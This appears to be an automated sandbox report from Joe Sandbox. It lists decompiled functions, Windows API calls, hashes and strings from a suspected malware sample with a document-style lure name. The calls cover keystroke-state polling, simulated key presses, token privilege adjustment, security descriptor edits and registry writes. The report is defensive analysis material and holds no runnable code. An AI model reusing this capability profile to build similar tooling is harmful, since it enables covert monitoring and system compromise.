                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: 3c}$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_}
                                                        • API String ID: 1357608183-3415470295
                                                        • Opcode ID: 7bd167e2057ed3172a4492597ce9c5d715421c467fcbda3a15fa096d9f55ebca
                                                        • Instruction ID: 967cc1e53be95d221c3cfbd056de3d633bf70b0d67faf7cb43ff5f45700406a1
                                                        • Opcode Fuzzy Hash: 7bd167e2057ed3172a4492597ce9c5d715421c467fcbda3a15fa096d9f55ebca
                                                        • Instruction Fuzzy Hash: 43938E71A042199BDB28CF98D881BEDB7B5FF48310F24816AE955EB381E7749EC1CB50
                                                        Function 007C48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 007C48DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007FD665
                                                        • IsIconic.USER32(?), ref: 007FD66E
                                                        • ShowWindow.USER32(?,00000009), ref: 007FD67B
                                                        • SetForegroundWindow.USER32(?), ref: 007FD685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007FD69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 007FD6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 007FD6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 007FD6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 007FD6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007FD6CF
                                                        • SetForegroundWindow.USER32(?), ref: 007FD6D2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD719
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD71E
                                                        • SetForegroundWindow.USER32(?), ref: 007FD721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 007FD748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: d1a282f4d56faaf957490eb7af2c8b0c64e9f872a1a2044ed7218e65c71b412a
                                                        • Instruction ID: 5950d3701342b9a7f78eb77d7dee22f1d57ce4266b93c22fb5a7698b608b622f
                                                        • Opcode Fuzzy Hash: d1a282f4d56faaf957490eb7af2c8b0c64e9f872a1a2044ed7218e65c71b412a
                                                        • Instruction Fuzzy Hash: A4316275A4031CBBEB206BA19C49F7F7E6DFB45B50F114029FB05EA2D1C6B45D00EAA0
                                                        Function 00818310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 008187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0081882B
                                                          • Part of subcall function 008187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00818858
                                                          • Part of subcall function 008187E1: GetLastError.KERNEL32 ref: 00818865
                                                        • _memset.LIBCMT ref: 00818353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008183A5
                                                        • CloseHandle.KERNEL32(?), ref: 008183B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008183CD
                                                        • GetProcessWindowStation.USER32 ref: 008183E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 008183F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0081840A
                                                          • Part of subcall function 008181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00818309), ref: 008181E0
                                                          • Part of subcall function 008181CB: CloseHandle.KERNEL32(?,?,00818309), ref: 008181F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: dd16d8f6d90d0c9639e72ba7ad17c64d17fe119f6ea1d4d90ad2add47210cdc1
                                                        • Instruction ID: 348a6704de5b7e52a3f723af729db087e8cd9a3c890c8da7fe5146d396499656
                                                        • Opcode Fuzzy Hash: dd16d8f6d90d0c9639e72ba7ad17c64d17fe119f6ea1d4d90ad2add47210cdc1
                                                        • Instruction Fuzzy Hash: 498168B1900249EFDF119FA4DC46AEEBBBDFF09304F144169F914E2261EB358A94DB20
                                                        Function 0082C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0082C78D
                                                        • FindClose.KERNEL32(00000000), ref: 0082C7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0082C806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0082C81D
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0082C844
                                                        • __swprintf.LIBCMT ref: 0082C890
                                                        • __swprintf.LIBCMT ref: 0082C8D3
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • __swprintf.LIBCMT ref: 0082C927
                                                          • Part of subcall function 007E3698: __woutput_l.LIBCMT ref: 007E36F1
                                                        • __swprintf.LIBCMT ref: 0082C975
                                                          • Part of subcall function 007E3698: __flsbuf.LIBCMT ref: 007E3713
                                                          • Part of subcall function 007E3698: __flsbuf.LIBCMT ref: 007E372B
                                                        • __swprintf.LIBCMT ref: 0082C9C4
                                                        • __swprintf.LIBCMT ref: 0082CA13
                                                        • __swprintf.LIBCMT ref: 0082CA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: cec648590f16f3f9eb09fd7f3bd341e4644f27f3609a6d9ac8e872117e130fce
                                                        • Instruction ID: 958cfbaddef8adf0c46e39e7286f9890794dfbc33a079515377b842f530e2495
                                                        • Opcode Fuzzy Hash: cec648590f16f3f9eb09fd7f3bd341e4644f27f3609a6d9ac8e872117e130fce
                                                        • Instruction Fuzzy Hash: 36A11CB1504344EBC744EBA4C889EAFB7ECFF98704F40492DF695C6151EA35EA48CB62
                                                        Function 0082EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0082EFB6
                                                        • _wcscmp.LIBCMT ref: 0082EFCB
                                                        • _wcscmp.LIBCMT ref: 0082EFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0082EFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0082F00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0082F026
                                                        • FindClose.KERNEL32(00000000), ref: 0082F031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0082F04D
                                                        • _wcscmp.LIBCMT ref: 0082F074
                                                        • _wcscmp.LIBCMT ref: 0082F08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082F09D
                                                        • SetCurrentDirectoryW.KERNEL32(00878920), ref: 0082F0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0082F0C5
                                                        • FindClose.KERNEL32(00000000), ref: 0082F0D2
                                                        • FindClose.KERNEL32(00000000), ref: 0082F0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 811a7dc156c8f51f9e082630dc2cc6c5e7d6a9081fc69ed77e053cf13d048854
                                                        • Instruction ID: 485aa6a62942f3f702787cebec82e19adbef40c0da1e02f059657034b348a0ed
                                                        • Opcode Fuzzy Hash: 811a7dc156c8f51f9e082630dc2cc6c5e7d6a9081fc69ed77e053cf13d048854
                                                        • Instruction Fuzzy Hash: 0831C136501628ABDB149BB4EC48AEEB7ACFF49360F104179EA14D3192DB74DA80CE65
                                                        Function 00840857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00840953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0084F910,00000000,?,00000000,?,?), ref: 008409C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00840A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00840A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 00840DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00840DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 1d87e0cc4a5c190d98053d2feda1d279695272d1837cfa51c3b7878fda7d56ca
                                                        • Instruction ID: 3406b6e2174b3509c2f153a96f549e1b6bc49d2d83971564f3d3c34a5365d9d2
                                                        • Opcode Fuzzy Hash: 1d87e0cc4a5c190d98053d2feda1d279695272d1837cfa51c3b7878fda7d56ca
                                                        • Instruction Fuzzy Hash: 82023475600615DFCB54EF24C889E2AB7E5FF89714F04895CFA8A9B262CB34EC41CB81
                                                        Function 0082F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0082F113
                                                        • _wcscmp.LIBCMT ref: 0082F128
                                                        • _wcscmp.LIBCMT ref: 0082F13F
                                                          • Part of subcall function 00824385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008243A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0082F16E
                                                        • FindClose.KERNEL32(00000000), ref: 0082F179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0082F195
                                                        • _wcscmp.LIBCMT ref: 0082F1BC
                                                        • _wcscmp.LIBCMT ref: 0082F1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082F1E5
                                                        • SetCurrentDirectoryW.KERNEL32(00878920), ref: 0082F203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0082F20D
                                                        • FindClose.KERNEL32(00000000), ref: 0082F21A
                                                        • FindClose.KERNEL32(00000000), ref: 0082F22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: e8ecf25d936c28f6ceee8e4f3c43ab747bf34958a4a6f7d858f9663201b27449
                                                        • Instruction ID: 1f59394a6db277f24f91bae58b982a84f3d479496410f85f364715bcd007dd31
                                                        • Opcode Fuzzy Hash: e8ecf25d936c28f6ceee8e4f3c43ab747bf34958a4a6f7d858f9663201b27449
                                                        • Instruction Fuzzy Hash: 5131C436501229AADB109F74FC49AEE77BCFF4A360F100175FA14E2292DB34DA95CE54
                                                        Function 0082A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0082A20F
                                                        • __swprintf.LIBCMT ref: 0082A231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0082A26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0082A293
                                                        • _memset.LIBCMT ref: 0082A2B2
                                                        • _wcsncpy.LIBCMT ref: 0082A2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0082A323
                                                        • CloseHandle.KERNEL32(00000000), ref: 0082A32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0082A337
                                                        • CloseHandle.KERNEL32(00000000), ref: 0082A341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: ea0b121c345640ca185dace33a533a23ae31150fe4cc30b0bc64b3bd777bcc5b
                                                        • Instruction ID: d843482aae5118ca505a1a41ee2807edd0f53e52ca498012b79f484290fd34c2
                                                        • Opcode Fuzzy Hash: ea0b121c345640ca185dace33a533a23ae31150fe4cc30b0bc64b3bd777bcc5b
                                                        • Instruction Fuzzy Hash: 1B31AEB5900159ABDB21DFA0DC49FEB77BCFF89700F1040BAF608D2261EB7496848B65
                                                        Function 007D66E1 Relevance: 22.1, Strings: 17, Instructions: 889COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 3c}$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew$_}
                                                        • API String ID: 0-3723656305
                                                        • Opcode ID: 281fcb54710b5236ba1f426194c25e781772aa6b9526f785eb5214454f730e83
                                                        • Instruction ID: d8ac4fb9b9e455a59eb2444632ca2a3427112c94dfff3362427441860f695bfc
                                                        • Opcode Fuzzy Hash: 281fcb54710b5236ba1f426194c25e781772aa6b9526f785eb5214454f730e83
                                                        • Instruction Fuzzy Hash: 06727DB5E00219DADF14CF58C8847EEB7B5FF48710F24816AE949EB384EB349981CB90
                                                        Function 00817CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00818202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0081821E
                                                          • Part of subcall function 00818202: GetLastError.KERNEL32(?,00817CE2,?,?,?), ref: 00818228
                                                          • Part of subcall function 00818202: GetProcessHeap.KERNEL32(00000008,?,?,00817CE2,?,?,?), ref: 00818237
                                                          • Part of subcall function 00818202: HeapAlloc.KERNEL32(00000000,?,00817CE2,?,?,?), ref: 0081823E
                                                          • Part of subcall function 00818202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00818255
                                                          • Part of subcall function 0081829F: GetProcessHeap.KERNEL32(00000008,00817CF8,00000000,00000000,?,00817CF8,?), ref: 008182AB
                                                          • Part of subcall function 0081829F: HeapAlloc.KERNEL32(00000000,?,00817CF8,?), ref: 008182B2
                                                          • Part of subcall function 0081829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00817CF8,?), ref: 008182C3
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00817D13
                                                        • _memset.LIBCMT ref: 00817D28
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00817D47
                                                        • GetLengthSid.ADVAPI32(?), ref: 00817D58
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00817D95
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00817DB1
                                                        • GetLengthSid.ADVAPI32(?), ref: 00817DCE
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00817DDD
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00817DE4
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00817E05
                                                        • CopySid.ADVAPI32(00000000), ref: 00817E0C
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00817E3D
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00817E63
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00817E77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: db36f7dbc2ed7ca18de0cbcec13cbea464773893d23c9e820e5b27d66f8432a5
                                                        • Instruction ID: b6e642e5db10704db2baaa66d6e522160d0bbbb6f786f170572e79b77267726f
                                                        • Opcode Fuzzy Hash: db36f7dbc2ed7ca18de0cbcec13cbea464773893d23c9e820e5b27d66f8432a5
                                                        • Instruction Fuzzy Hash: ED617875900609EFDF01CFA4DC85AEEBBB9FF04700F14826DE915E62A2DB319A41CB60
                                                        Function 0082001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00820097
                                                        • SetKeyboardState.USER32(?), ref: 00820102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00820122
                                                        • GetKeyState.USER32(000000A0), ref: 00820139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00820168
                                                        • GetKeyState.USER32(000000A1), ref: 00820179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 008201A5
                                                        • GetKeyState.USER32(00000011), ref: 008201B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 008201DC
                                                        • GetKeyState.USER32(00000012), ref: 008201EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00820213
                                                        • GetKeyState.USER32(0000005B), ref: 00820221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: f97e8c4c74fb3519ee3e618fcb9ef3c7eb1ca5c2e6e4808b2bcf33659ccf4f9c
                                                        • Instruction ID: d13fdc6cbb79649701d886c84bfb729940b79e6c8da7a393acc7271e373fe3cb
                                                        • Opcode Fuzzy Hash: f97e8c4c74fb3519ee3e618fcb9ef3c7eb1ca5c2e6e4808b2bcf33659ccf4f9c
                                                        • Instruction Fuzzy Hash: 8A51FD209047A829FB35D764A8547EABFB4FF11380F08459E85C1DA1C3DA649BCCCF62
                                                        Function 008403DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00840E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008404AC
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0084054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008405E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00840822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0084082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
